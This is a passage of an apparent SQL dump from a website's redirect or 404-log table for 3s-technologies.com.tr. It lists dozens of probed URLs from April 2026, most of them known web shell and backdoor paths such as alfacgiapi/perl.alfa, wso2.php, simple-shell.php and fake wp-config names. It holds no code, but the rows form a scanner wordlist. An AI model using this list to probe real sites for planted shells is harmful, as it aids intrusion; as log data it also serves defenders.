14:59:20','0000-00-00 00:00:00',301),(63068,'http://mail.3s-technologies.com.tr/tr/xynz.php',NULL,'','',6,0,'2026-04-12 14:59:22','0000-00-00 00:00:00',301),(63069,'http://mail.3s-technologies.com.tr/tr/wp-01ul.php',NULL,'','',4,0,'2026-04-12 14:59:22','0000-00-00 00:00:00',301),(63070,'http://mail.3s-technologies.com.tr/tr/e7.php',NULL,'','',3,0,'2026-04-12 14:59:23','0000-00-00 00:00:00',301),(63071,'http://mail.3s-technologies.com.tr/tr/e3.php',NULL,'','',4,0,'2026-04-12 14:59:23','0000-00-00 00:00:00',301),(63072,'http://mail.3s-technologies.com.tr/tr/cilus.php',NULL,'','',17,0,'2026-04-12 14:59:25','0000-00-00 00:00:00',301),(63073,'http://mail.3s-technologies.com.tr/tr/curl.php',NULL,'','',3,0,'2026-04-12 14:59:27','0000-00-00 00:00:00',301),(63074,'http://mail.3s-technologies.com.tr/tr/goods_260325043000.php',NULL,'','',3,0,'2026-04-12 14:59:30','0000-00-00 00:00:00',301),(63075,'http://mail.3s-technologies.com.tr/tr/goods_260401065719.php',NULL,'','',3,0,'2026-04-12 14:59:30','0000-00-00 00:00:00',301),(63076,'http://mail.3s-technologies.com.tr/tr/ goods.php',NULL,'','',4,0,'2026-04-12 16:43:43','0000-00-00 00:00:00',301),(63077,'http://mail.3s-technologies.com.tr/tr/privacy.php',NULL,'','',4,0,'2026-04-12 16:44:14','0000-00-00 00:00:00',301),(63078,'http://mail.3s-technologies.com.tr/tr/.wp-cache.php',NULL,'','',4,0,'2026-04-12 16:44:43','0000-00-00 00:00:00',301),(63079,'http://3s-technologies.com.tr/tr/hroxw.php',NULL,'','',4,0,'2026-04-12 16:44:49','0000-00-00 00:00:00',301),(63080,'http://3s-technologies.com.tr/tr/rkszbxbh.php',NULL,'','',1,0,'2026-04-12 16:44:50','0000-00-00 00:00:00',301),(63081,'http://3s-technologies.com.tr/tr/datab',NULL,'','',1,0,'2026-04-12 16:44:53','0000-00-00 00:00:00',301),(63082,'http://3s-technologies.com.tr/tr/css/r1.php',NULL,'','',1,0,'2026-04-12 16:44:54','0000-00-00 00:00:00',301),(63083,'http://3s-technologies.com.tr/tr/suck.php',NULL,'','',1,0,'2026-04-12 16:44:58','0000-00-00 00:00:00',301),(63084,'http://3s-technologies.com.tr/tr/hikudpno.php',NULL,'','',1,0,'2026-04-12 16:44:59','0000-00-00 00:00:00',301),(63085,'http://3s-technologies.com.tr/tr/sure.php',NULL,'','',1,0,'2026-04-12 16:45:00','0000-00-00 00:00:00',301),(63086,'http://3s-technologies.com.tr/tr/reune.php',NULL,'','',2,0,'2026-04-12 16:45:03','0000-00-00 00:00:00',301),(63087,'http://3s-technologies.com.tr/tr/dw.php',NULL,'','',1,0,'2026-04-12 16:45:04','0000-00-00 00:00:00',301),(63088,'http://3s-technologies.com.tr/tr/js/l.php',NULL,'','',1,0,'2026-04-12 16:45:06','0000-00-00 00:00:00',301),(63089,'http://3s-technologies.com.tr/tr/lnexugel.php',NULL,'','',1,0,'2026-04-12 16:45:08','0000-00-00 00:00:00',301),(63090,'http://3s-technologies.com.tr/tr/online.php',NULL,'','',1,0,'2026-04-12 16:45:09','0000-00-00 00:00:00',301),(63091,'http://3s-technologies.com.tr/tr/up-kon.php',NULL,'','',1,0,'2026-04-12 16:45:09','0000-00-00 00:00:00',301),(63092,'http://3s-technologies.com.tr/tr/jcsonquo.php',NULL,'','',1,0,'2026-04-12 16:45:12','0000-00-00 00:00:00',301),(63093,'http://3s-technologies.com.tr/tr/rc.php7',NULL,'','',2,0,'2026-04-12 16:45:14','0000-00-00 00:00:00',301),(63094,'http://3s-technologies.com.tr/tr/rin.php',NULL,'','',1,0,'2026-04-12 16:45:16','0000-00-00 00:00:00',301),(63095,'http://3s-technologies.com.tr/tr/packages.php',NULL,'','',1,0,'2026-04-12 16:45:16','0000-00-00 00:00:00',301),(63096,'http://3s-technologies.com.tr/tr/simple-shell.php',NULL,'','',1,0,'2026-04-12 16:45:20','0000-00-00 00:00:00',301),(63097,'http://3s-technologies.com.tr/tr/js/dist/vendor/about.php',NULL,'','',1,0,'2026-04-12 16:45:21','0000-00-00 00:00:00',301),(63098,'http://3s-technologies.com.tr/tr/bsr.php',NULL,'','',1,0,'2026-04-12 16:45:23','0000-00-00 00:00:00',301),(63099,'http://3s-technologies.com.tr/tr/core-wp.php',NULL,'','',1,0,'2026-04-12 16:45:25','0000-00-00 00:00:00',301),(63100,'http://3s-technologies.com.tr/tr/pomo/v2.php',NULL,'','',1,0,'2026-04-12 16:45:26','0000-00-00 00:00:00',301),(63101,'http://3s-technologies.com.tr/tr/nxd.php',NULL,'','',1,0,'2026-04-12 16:45:27','0000-00-00 00:00:00',301),(63102,'http://mail.3s-technologies.com.tr/tr/wp-admin/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 16:45:28','0000-00-00 00:00:00',301),(63103,'http://3s-technologies.com.tr/tr/uxquidwa.php',NULL,'','',1,0,'2026-04-12 16:45:29','0000-00-00 00:00:00',301),(63104,'http://mail.3s-technologies.com.tr/tr/wp-content/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 16:45:30','0000-00-00 00:00:00',301),(63105,'http://3s-technologies.com.tr/tr/luf.php',NULL,'','',1,0,'2026-04-12 16:45:35','0000-00-00 00:00:00',301),(63106,'http://3s-technologies.com.tr/tr/gely.php',NULL,'','',1,0,'2026-04-12 16:45:58','0000-00-00 00:00:00',301),(63107,'http://3s-technologies.com.tr/tr/sagafif.php',NULL,'','',1,0,'2026-04-12 16:45:59','0000-00-00 00:00:00',301),(63108,'http://3s-technologies.com.tr/tr/wp-trc.php',NULL,'','',1,0,'2026-04-12 16:46:00','0000-00-00 00:00:00',301),(63109,'http://3s-technologies.com.tr/tr/tesla1.php',NULL,'','',1,0,'2026-04-12 16:46:01','0000-00-00 00:00:00',301),(63110,'http://3s-technologies.com.tr/tr/pomo/l.php',NULL,'','',1,0,'2026-04-12 16:46:02','0000-00-00 00:00:00',301),(63111,'http://3s-technologies.com.tr/tr/ktgob.php',NULL,'','',1,0,'2026-04-12 16:46:03','0000-00-00 00:00:00',301),(63112,'http://3s-technologies.com.tr/tr/yunu.php',NULL,'','',1,0,'2026-04-12 16:46:06','0000-00-00 00:00:00',301),(63113,'http://www.3s-technologies.com.tr/tr/ goods.php',NULL,'','',2,0,'2026-04-12 17:40:54','0000-00-00 00:00:00',301),(63114,'http://www.3s-technologies.com.tr/tr/privacy.php',NULL,'','',2,0,'2026-04-12 17:41:18','0000-00-00 00:00:00',301),(63115,'http://www.3s-technologies.com.tr/tr/wp-conffg.php',NULL,'','',2,0,'2026-04-12 17:41:20','0000-00-00 00:00:00',301),(63116,'http://www.3s-technologies.com.tr/tr/wp-settings.php',NULL,'','',2,0,'2026-04-12 17:41:21','0000-00-00 00:00:00',301),(63117,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/atomlib.php',NULL,'','',1,0,'2026-04-12 17:41:24','0000-00-00 00:00:00',301),(63118,'http://www.3s-technologies.com.tr/tr/blog.php',NULL,'','',2,0,'2026-04-12 17:41:50','0000-00-00 00:00:00',301),(63119,'http://www.3s-technologies.com.tr/tr/it.php',NULL,'','',2,0,'2026-04-12 17:41:51','0000-00-00 00:00:00',301),(63120,'http://www.3s-technologies.com.tr/tr/wp-includes/css/dist/niil.php',NULL,'','',1,0,'2026-04-12 17:41:51','0000-00-00 00:00:00',301),(63121,'http://www.3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519-items.php',NULL,'','',1,0,'2026-04-12 17:41:52','0000-00-00 00:00:00',301),(63122,'http://www.3s-technologies.com.tr/tr/kiss.php',NULL,'','',2,0,'2026-04-12 17:41:53','0000-00-00 00:00:00',301),(63123,'http://www.3s-technologies.com.tr/tr/ohayo.php',NULL,'','',2,0,'2026-04-12 17:41:56','0000-00-00 00:00:00',301),(63124,'http://www.3s-technologies.com.tr/tr/cms.php',NULL,'','',2,0,'2026-04-12 17:41:58','0000-00-00 00:00:00',301),(63125,'http://www.3s-technologies.com.tr/tr/wp-uploads.php',NULL,'','',2,0,'2026-04-12 17:41:59','0000-00-00 00:00:00',301),(63126,'http://www.3s-technologies.com.tr/tr/gel.php',NULL,'','',2,0,'2026-04-12 17:42:00','0000-00-00 00:00:00',301),(63127,'http://www.3s-technologies.com.tr/tr/.fk.php',NULL,'','',2,0,'2026-04-12 17:42:04','0000-00-00 00:00:00',301),(63128,'http://www.3s-technologies.com.tr/tr/alexuse.php',NULL,'','',2,0,'2026-04-12 17:42:05','0000-00-00 00:00:00',301),(63129,'http://www.3s-technologies.com.tr/tr/sendemail.php',NULL,'','',2,0,'2026-04-12 17:42:06','0000-00-00 00:00:00',301),(63130,'http://www.3s-technologies.com.tr/tr/olu.php',NULL,'','',2,0,'2026-04-12 17:42:08','0000-00-00 00:00:00',301),(63131,'http://www.3s-technologies.com.tr/tr/alexusmailer 2.0.php',NULL,'','',2,0,'2026-04-12 17:42:16','0000-00-00 00:00:00',301),(63132,'http://www.3s-technologies.com.tr/tr/rss.php',NULL,'','',2,0,'2026-04-12 17:42:17','0000-00-00 00:00:00',301),(63133,'http://www.3s-technologies.com.tr/tr/wso2.php',NULL,'','',2,0,'2026-04-12 17:42:19','0000-00-00 00:00:00',301),(63134,'http://www.3s-technologies.com.tr/tr/wp-confiig.php',NULL,'','',2,0,'2026-04-12 17:42:23','0000-00-00 00:00:00',301),(63135,'http://www.3s-technologies.com.tr/tr/file-manager.php',NULL,'','',2,0,'2026-04-12 17:42:23','0000-00-00 00:00:00',301),(63136,'http://www.3s-technologies.com.tr/tr/.well-known/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:26','0000-00-00 00:00:00',301),(63137,'http://www.3s-technologies.com.tr/tr/tmp_images/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:27','0000-00-00 00:00:00',301),(63138,'http://www.3s-technologies.com.tr/tr/wp-admin/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:27','0000-00-00 00:00:00',301),(63139,'http://www.3s-technologies.com.tr/tr/wp-content/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:28','0000-00-00 00:00:00',301),(63140,'http://www.3s-technologies.com.tr/tr/wp-includes/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:31','0000-00-00 00:00:00',301),(63141,'http://www.3s-technologies.com.tr/tr/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:32','0000-00-00 00:00:00',301),(63142,'http://www.3s-technologies.com.tr/tr/css/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:34','0000-00-00 00:00:00',301),(63143,'http://www.3s-technologies.com.tr/tr/files/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:35','0000-00-00 00:00:00',301),(63144,'http://www.3s-technologies.com.tr/tr/images/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-12 17:42:35','0000-00-00 00:00:00',301),(63145,'http://www.3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa\"',NULL,'','',1,0,'2026-04-12 17:42:36','0000-00-00 00:00:00',301),(63146,'http://www.3s-technologies.com.tr/tr/date.php',NULL,'','',3,0,'2026-04-12 17:42:38','0000-00-00 00:00:00',301),(63147,'http://www.3s-technologies.com.tr/tr/pomo.php',NULL,'','',3,0,'2026-04-12 17:42:40','0000-00-00 00:00:00',301),(63148,'http://www.3s-technologies.com.tr/tr/wp-admin/images/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:40','0000-00-00 00:00:00',301),(63149,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:42','0000-00-00 00:00:00',301),(63150,'http://www.3s-technologies.com.tr/tr/wp-admin/js/widgets/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:43','0000-00-00 00:00:00',301),(63151,'http://www.3s-technologies.com.tr/tr/wp-admin/js/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:43','0000-00-00 00:00:00',301),(63152,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:44','0000-00-00 00:00:00',301),(63153,'http://www.3s-technologies.com.tr/tr/wp-admin/network/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:45','0000-00-00 00:00:00',301),(63154,'http://www.3s-technologies.com.tr/tr/wp-admin/user/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:45','0000-00-00 00:00:00',301),(63155,'http://www.3s-technologies.com.tr/tr/wp-content/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:46','0000-00-00 00:00:00',301),(63156,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:47','0000-00-00 00:00:00',301),(63157,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:47','0000-00-00 00:00:00',301),(63158,'http://www.3s-technologies.com.tr/tr/wp-content/languages/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:48','0000-00-00 00:00:00',301),(63159,'http://www.3s-technologies.com.tr/tr/wp-content/languages/themes/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:48','0000-00-00 00:00:00',301),(63160,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/pomo.php',NULL,'','',1,0,'2026-04-12 17:42:49','0000-00-00 00:00:00',301),(63161,'http://mail.3s-technologies.com.tr/tr/tymi.php',NULL,'','',3,0,'2026-04-12 17:49:34','0000-00-00 00:00:00',301),(63162,'http://mail.3s-technologies.com.tr/tr/ss72_kkkjt.php',NULL,'','',3,0,'2026-04-12 17:49:36','0000-00-00 00:00:00',301),(63163,'http://mail.3s-technologies.com.tr/tr/wkogn.php',NULL,'','',3,0,'2026-04-12 17:49:37','0000-00-00 00:00:00',301),(63164,'http://mail.3s-technologies.com.tr/tr/hwjtry0zd1fzeakcuzn8cdefault.php',NULL,'','',3,0,'2026-04-12 17:49:37','0000-00-00 00:00:00',301),(63165,'http://mail.3s-technologies.com.tr/tr/wwdgl.php',NULL,'','',3,0,'2026-04-12 17:49:38','0000-00-00 00:00:00',301),(63166,'http://mail.3s-technologies.com.tr/tr/hla-dd.php',NULL,'','',3,0,'2026-04-12 17:49:40','0000-00-00 00:00:00',301),(63167,'http://mail.3s-technologies.com.tr/tr/bhqks28cw94.php',NULL,'','',3,0,'2026-04-12 17:49:40','0000-00-00 00:00:00',301),(63168,'http://mail.3s-technologies.com.tr/tr/cdn3.php',NULL,'','',3,0,'2026-04-12 17:49:41','0000-00-00 00:00:00',301),(63169,'http://mail.3s-technologies.com.tr/tr/beerd.php',NULL,'','',3,0,'2026-04-12 17:49:42','0000-00-00 00:00:00',301),(63170,'http://mail.3s-technologies.com.tr/tr/161dfd072f.php',NULL,'','',3,0,'2026-04-12 17:49:43','0000-00-00 00:00:00',301),(63171,'http://mail.3s-technologies.com.tr/tr/ylzed0twj8l9drdbchc1oocfcdefault.php',NULL,'','',3,0,'2026-04-12 17:49:44','0000-00-00 00:00:00',301),(63172,'http://mail.3s-technologies.com.tr/tr/blqjs.php',NULL,'','',3,0,'2026-04-12 17:49:46','0000-00-00 00:00:00',301),(63173,'http://mail.3s-technologies.com.tr/tr/oircv.php',NULL,'','',3,0,'2026-04-12 17:49:48','0000-00-00 00:00:00',301),(63174,'http://mail.3s-technologies.com.tr/tr/spow_srw.php',NULL,'','',3,0,'2026-04-12 17:49:50','0000-00-00 00:00:00',301),(63175,'http://mail.3s-technologies.com.tr/tr/albrt.php',NULL,'','',3,0,'2026-04-12 17:49:50','0000-00-00 00:00:00',301),(63176,'http://mail.3s-technologies.com.tr/tr/xxiviclhot.php',NULL,'','',3,0,'2026-04-12 17:49:51','0000-00-00 00:00:00',301),(63177,'http://mail.3s-technologies.com.tr/tr/acc.php',NULL,'','',5,0,'2026-04-12 17:49:52','0000-00-00 00:00:00',301),(63178,'http://mail.3s-technologies.com.tr/tr/wxeyc.php',NULL,'','',3,0,'2026-04-12 17:49:53','0000-00-00 00:00:00',301),(63179,'http://mail.3s-technologies.com.tr/tr/fyflv.php',NULL,'','',3,0,'2026-04-12 17:49:55','0000-00-00 00:00:00',301),(63180,'http://mail.3s-technologies.com.tr/tr/zc-942.php',NULL,'','',3,0,'2026-04-12 17:49:55','0000-00-00 00:00:00',301),(63181,'http://mail.3s-technologies.com.tr/tr/wpxl.php',NULL,'','',7,0,'2026-04-12 17:49:58','0000-00-00 00:00:00',301),(63182,'http://mail.3s-technologies.com.tr/tr/bfil.php',NULL,'','',5,0,'2026-04-12 17:49:59','0000-00-00 00:00:00',301),(63183,'http://mail.3s-technologies.com.tr/tr/p14raewytpdh5hzcsccfdefault.php',NULL,'','',3,0,'2026-04-12 17:50:01','0000-00-00 00:00:00',301),(63184,'http://mail.3s-technologies.com.tr/tr/maintura.php',NULL,'','',3,0,'2026-04-12 17:50:01','0000-00-00 00:00:00',301),(63185,'http://mail.3s-technologies.com.tr/tr/iee52ruz0s81ndrdefault.php',NULL,'','',3,0,'2026-04-12 17:50:02','0000-00-00 00:00:00',301),(63186,'http://mail.3s-technologies.com.tr/tr/nvwf4svpvqohxdjtbjcdefault.php',NULL,'','',3,0,'2026-04-12 17:50:02','0000-00-00 00:00:00',301),(63187,'http://mail.3s-technologies.com.tr/tr/zc-220.php',NULL,'','',3,0,'2026-04-12 17:50:03','0000-00-00 00:00:00',301),(63188,'http://mail.3s-technologies.com.tr/tr/xxivildiot.php',NULL,'','',3,0,'2026-04-12 17:50:04','0000-00-00 00:00:00',301),(63189,'http://mail.3s-technologies.com.tr/tr/hanyatersenyum.php',NULL,'','',3,0,'2026-04-12 17:50:05','0000-00-00 00:00:00',301),(63190,'http://mail.3s-technologies.com.tr/tr/upll22.php',NULL,'','',3,0,'2026-04-12 17:50:06','0000-00-00 00:00:00',301),(63191,'http://mail.3s-technologies.com.tr/tr/zc-243.php',NULL,'','',5,0,'2026-04-12 17:50:08','0000-00-00 00:00:00',301),(63192,'http://mail.3s-technologies.com.tr/tr/pm90apbv3v5fvgkbguyicdefault.php',NULL,'','',3,0,'2026-04-12 17:50:08','0000-00-00 00:00:00',301),(63193,'http://mail.3s-technologies.com.tr/tr/wp/jp.php',NULL,'','',3,0,'2026-04-12 17:50:36','0000-00-00 00:00:00',301),(63194,'http://mail.3s-technologies.com.tr/tr/msl.php',NULL,'','',2,0,'2026-04-12 18:15:28','0000-00-00 00:00:00',301),(63195,'http://mail.3s-technologies.com.tr/tr/obfs.php',NULL,'','',2,0,'2026-04-12 18:15:29','0000-00-00 00:00:00',301),(63196,'http://mail.3s-technologies.com.tr/tr/ms-sites.php',NULL,'','',2,0,'2026-04-12 18:15:30','0000-00-00 00:00:00',301),(63197,'http://mail.3s-technologies.com.tr/tr/assets/theme_app.php',NULL,'','',2,0,'2026-04-12 18:15:32','0000-00-00 00:00:00',301),(63198,'http://mail.3s-technologies.com.tr/tr/wp-admin/atomlib.php',NULL,'','',2,0,'2026-04-12 18:15:34','0000-00-00 00:00:00',301),(63199,'http://mail.3s-technologies.com.tr/tr/gbl.php',NULL,'','',2,0,'2026-04-12 18:15:35','0000-00-00 00:00:00',301),(63200,'http://mail.3s-technologies.com.tr/tr/.ufc/ss.php',NULL,'','',2,0,'2026-04-12 18:15:36','0000-00-00 00:00:00',301),(63201,'http://mail.3s-technologies.com.tr/tr/tester.php',NULL,'','',2,0,'2026-04-12 18:15:36','0000-00-00 00:00:00',301),(63202,'http://mail.3s-technologies.com.tr/tr/okaay.php',NULL,'','',2,0,'2026-04-12 18:15:37','0000-00-00 00:00:00',301),(63203,'http://mail.3s-technologies.com.tr/tr/page_m.php',NULL,'','',2,0,'2026-04-12 18:15:38','0000-00-00 00:00:00',301),(63204,'http://mail.3s-technologies.com.tr/tr/wp-themes.php7',NULL,'','',2,0,'2026-04-12 18:15:40','0000-00-00 00:00:00',301),(63205,'http://mail.3s-technologies.com.tr/tr/wong.php',NULL,'','',2,0,'2026-04-12 18:15:42','0000-00-00 00:00:00',301),(63206,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/up.php',NULL,'','',2,0,'2026-04-12 18:15:42','0000-00-00 00:00:00',301),(63207,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/upfile.php',NULL,'','',2,0,'2026-04-12 18:15:43','0000-00-00 00:00:00',301),(63208,'http://mail.3s-technologies.com.tr/tr/alfa_data/alfacgiapi/upfile.php',NULL,'','',2,0,'2026-04-12 18:15:44','0000-00-00 00:00:00',301),(63209,'http://mail.3s-technologies.com.tr/tr/smtp.php',NULL,'','',5,0,'2026-04-12 18:15:45','0000-00-00 00:00:00',301),(63210,'http://mail.3s-technologies.com.tr/tr/wp-hoard.php',NULL,'','',2,0,'2026-04-12 18:15:46','0000-00-00 00:00:00',301),(63211,'http://mail.3s-technologies.com.tr/tr/.tmb/users.php',NULL,'','',2,0,'2026-04-12 18:15:46','0000-00-00 00:00:00',301),(63212,'http://mail.3s-technologies.com.tr/tr/alfa_data/alfacgiapi/menu.php',NULL,'','',2,0,'2026-04-12 18:15:47','0000-00-00 00:00:00',301),(63213,'http://mail.3s-technologies.com.tr/tr/wp-seo.php',NULL,'','',2,0,'2026-04-12 18:15:49','0000-00-00 00:00:00',301),(63214,'http://mail.3s-technologies.com.tr/tr/ioxi-rex.php',NULL,'','',2,0,'2026-04-12 18:15:50','0000-00-00 00:00:00',301),(63215,'http://mail.3s-technologies.com.tr/tr/.well-known/warm.php7',NULL,'','',2,0,'2026-04-12 18:15:51','0000-00-00 00:00:00',301),(63216,'http://mail.3s-technologies.com.tr/tr/.tmb/warm.php7',NULL,'','',2,0,'2026-04-12 18:15:51','0000-00-00 00:00:00',301),(63217,'http://mail.3s-technologies.com.tr/tr/alfa2.php',NULL,'','',2,0,'2026-04-12 18:15:52','0000-00-00 00:00:00',301),(63218,'http://mail.3s-technologies.com.tr/tr/alfa-priv.php',NULL,'','',2,0,'2026-04-12 18:15:53','0000-00-00 00:00:00',301),(63219,'http://mail.3s-technologies.com.tr/tr/wp-include/alfa.php',NULL,'','',2,0,'2026-04-12 18:15:55','0000-00-00 00:00:00',301),(63220,'http://mail.3s-technologies.com.tr/tr/f77.php',NULL,'','',2,0,'2026-04-12 18:15:56','0000-00-00 00:00:00',301),(63221,'http://mail.3s-technologies.com.tr/tr/nice.php',NULL,'','',2,0,'2026-04-12 18:15:57','0000-00-00 00:00:00',301),(63222,'http://mail.3s-technologies.com.tr/tr/b0.php',NULL,'','',2,0,'2026-04-12 18:15:58','0000-00-00 00:00:00',301),(63223,'http://mail.3s-technologies.com.tr/tr/million.php',NULL,'','',2,0,'2026-04-12 18:15:58','0000-00-00 00:00:00',301),(63224,'http://mail.3s-technologies.com.tr/tr/wp-consar.php',NULL,'','',2,0,'2026-04-12 18:16:00','0000-00-00 00:00:00',301),(63225,'http://mail.3s-technologies.com.tr/tr/wp-admin/repeater.php',NULL,'','',2,0,'2026-04-12 18:16:01','0000-00-00 00:00:00',301),(63226,'http://mail.3s-technologies.com.tr/tr/wp-content/banners/about.php',NULL,'','',2,0,'2026-04-12 18:16:01','0000-00-00 00:00:00',301),(63227,'http://mail.3s-technologies.com.tr/tr/repeater.php',NULL,'','',2,0,'2026-04-12 18:16:02','0000-00-00 00:00:00',301),(63228,'http://mail.3s-technologies.com.tr/tr/wp-p.php7',NULL,'','',2,0,'2026-04-12 18:16:04','0000-00-00 00:00:00',301),(63229,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/cloud.php',NULL,'','',2,0,'2026-04-12 18:16:05','0000-00-00 00:00:00',301),(63230,'http://mail.3s-technologies.com.tr/tr/ebs.php7',NULL,'','',2,0,'2026-04-12 18:16:06','0000-00-00 00:00:00',301),(63231,'http://mail.3s-technologies.com.tr/tr/fileman/php/upload.php',NULL,'','',2,0,'2026-04-12 18:16:07','0000-00-00 00:00:00',301),(63232,'http://mail.3s-technologies.com.tr/tr/anonse/lock360.php',NULL,'','',2,0,'2026-04-12 18:16:11','0000-00-00 00:00:00',301),(63233,'http://mail.3s-technologies.com.tr/tr/load.php',NULL,'','',5,0,'2026-04-12 18:16:14','0000-00-00 00:00:00',301),(63234,'http://mail.3s-technologies.com.tr/tr/api/api.php',NULL,'','',2,0,'2026-04-12 18:16:17','0000-00-00 00:00:00',301),(63235,'http://mail.3s-technologies.com.tr/tr/filemgrfiles/hui0uh.php',NULL,'','',2,0,'2026-04-12 18:16:17','0000-00-00 00:00:00',301),(63236,'http://mail.3s-technologies.com.tr/tr/yanzmini.php',NULL,'','',2,0,'2026-04-12 18:16:18','0000-00-00 00:00:00',301),(63237,'http://mail.3s-technologies.com.tr/tr/aff.php',NULL,'','',2,0,'2026-04-12 18:16:19','0000-00-00 00:00:00',301),(63238,'http://mail.3s-technologies.com.tr/tr/backup/index.php',NULL,'','',2,0,'2026-04-12 18:16:22','0000-00-00 00:00:00',301),(63239,'http://mail.3s-technologies.com.tr/tr/delpaths.php',NULL,'','',2,0,'2026-04-12 18:16:25','0000-00-00 00:00:00',301),(63240,'http://mail.3s-technologies.com.tr/tr/fonts.php',NULL,'','',2,0,'2026-04-12 18:16:28','0000-00-00 00:00:00',301),(63241,'http://mail.3s-technologies.com.tr/tr/man.php7',NULL,'','',2,0,'2026-04-12 18:16:30','0000-00-00 00:00:00',301),(63242,'http://mail.3s-technologies.com.tr/tr/mango.php',NULL,'','',2,0,'2026-04-12 18:16:31','0000-00-00 00:00:00',301),(63243,'http://mail.3s-technologies.com.tr/tr/memberfuns.php',NULL,'','',2,0,'2026-04-12 18:16:32','0000-00-00 00:00:00',301),(63244,'http://mail.3s-technologies.com.tr/tr/menu-header.php',NULL,'','',2,0,'2026-04-12 18:16:33','0000-00-00 00:00:00',301),(63245,'http://mail.3s-technologies.com.tr/tr/signup.php',NULL,'','',2,0,'2026-04-12 18:16:34','0000-00-00 00:00:00',301),(63246,'http://mail.3s-technologies.com.tr/tr/solevisible.php',NULL,'','',2,0,'2026-04-12 18:16:35','0000-00-00 00:00:00',301),(63247,'http://mail.3s-technologies.com.tr/tr/wp-admin/users.php',NULL,'','',2,0,'2026-04-12 18:16:36','0000-00-00 00:00:00',301),(63248,'http://mail.3s-technologies.com.tr/tr/wp-comments-pos.php',NULL,'','',2,0,'2026-04-12 18:16:37','0000-00-00 00:00:00',301),(63249,'http://mail.3s-technologies.com.tr/tr/wp-link.php',NULL,'','',2,0,'2026-04-12 18:16:38','0000-00-00 00:00:00',301),(63250,'http://mail.3s-technologies.com.tr/tr/wp-cro.php',NULL,'','',2,0,'2026-04-12 18:16:39','0000-00-00 00:00:00',301),(63251,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/abou.php',NULL,'','',2,0,'2026-04-12 18:16:39','0000-00-00 00:00:00',301),(63252,'http://mail.3s-technologies.com.tr/tr/map.php',NULL,'','',2,0,'2026-04-12 18:16:40','0000-00-00 00:00:00',301),(63253,'http://mail.3s-technologies.com.tr/tr/wp-includes/ioxi-o.php',NULL,'','',2,0,'2026-04-12 18:16:41','0000-00-00 00:00:00',301),(63254,'http://mail.3s-technologies.com.tr/tr/wp-mai.php',NULL,'','',2,0,'2026-04-12 18:16:42','0000-00-00 00:00:00',301),(63255,'http://mail.3s-technologies.com.tr/tr/wp-taglin.php',NULL,'','',2,0,'2026-04-12 18:16:42','0000-00-00 00:00:00',301),(63256,'http://mail.3s-technologies.com.tr/tr/wp-editor.php',NULL,'','',2,0,'2026-04-12 18:16:43','0000-00-00 00:00:00',301),(63257,'http://mail.3s-technologies.com.tr/tr/comfunctions.php',NULL,'','',2,0,'2026-04-12 18:16:47','0000-00-00 00:00:00',301),(63258,'http://mail.3s-technologies.com.tr/tr/header.php',NULL,'','',2,0,'2026-04-12 18:16:51','0000-00-00 00:00:00',301),(63259,'http://mail.3s-technologies.com.tr/tr/home.php',NULL,'','',2,0,'2026-04-12 18:16:52','0000-00-00 00:00:00',301),(63260,'http://mail.3s-technologies.com.tr/tr/wp-content.php',NULL,'','',2,0,'2026-04-12 18:17:03','0000-00-00 00:00:00',301),(63261,'http://mail.3s-technologies.com.tr/tr/wp-includes.php',NULL,'','',2,0,'2026-04-12 18:17:03','0000-00-00 00:00:00',301),(63262,'http://mail.3s-technologies.com.tr/tr/import.php',NULL,'','',2,0,'2026-04-12 18:17:11','0000-00-00 00:00:00',301),(63263,'http://mail.3s-technologies.com.tr/tr/wp-today.php',NULL,'','',2,0,'2026-04-12 18:17:13','0000-00-00 00:00:00',301),(63264,'http://mail.3s-technologies.com.tr/tr/noop.php',NULL,'','',2,0,'2026-04-12 18:17:17','0000-00-00 00:00:00',301),(63265,'http://mail.3s-technologies.com.tr/tr/repair.php',NULL,'','',2,0,'2026-04-12 18:17:18','0000-00-00 00:00:00',301),(63266,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-patterns/admin.php',NULL,'','',2,0,'2026-04-12 18:17:19','0000-00-00 00:00:00',301),(63267,'http://3s-technologies.com.tr/tr/ssh3ll.php',NULL,'','',4,0,'2026-04-12 19:03:31','0000-00-00 00:00:00',301),(63268,'http://3s-technologies.com.tr/tr/msl.php',NULL,'','',3,0,'2026-04-12 20:11:47','0000-00-00 00:00:00',301),(63269,'http://3s-technologies.com.tr/tr/obfs.php',NULL,'','',3,0,'2026-04-12 20:11:47','0000-00-00 00:00:00',301),(63270,'http://3s-technologies.com.tr/tr/ms-sites.php',NULL,'','',3,0,'2026-04-12 20:11:49','0000-00-00 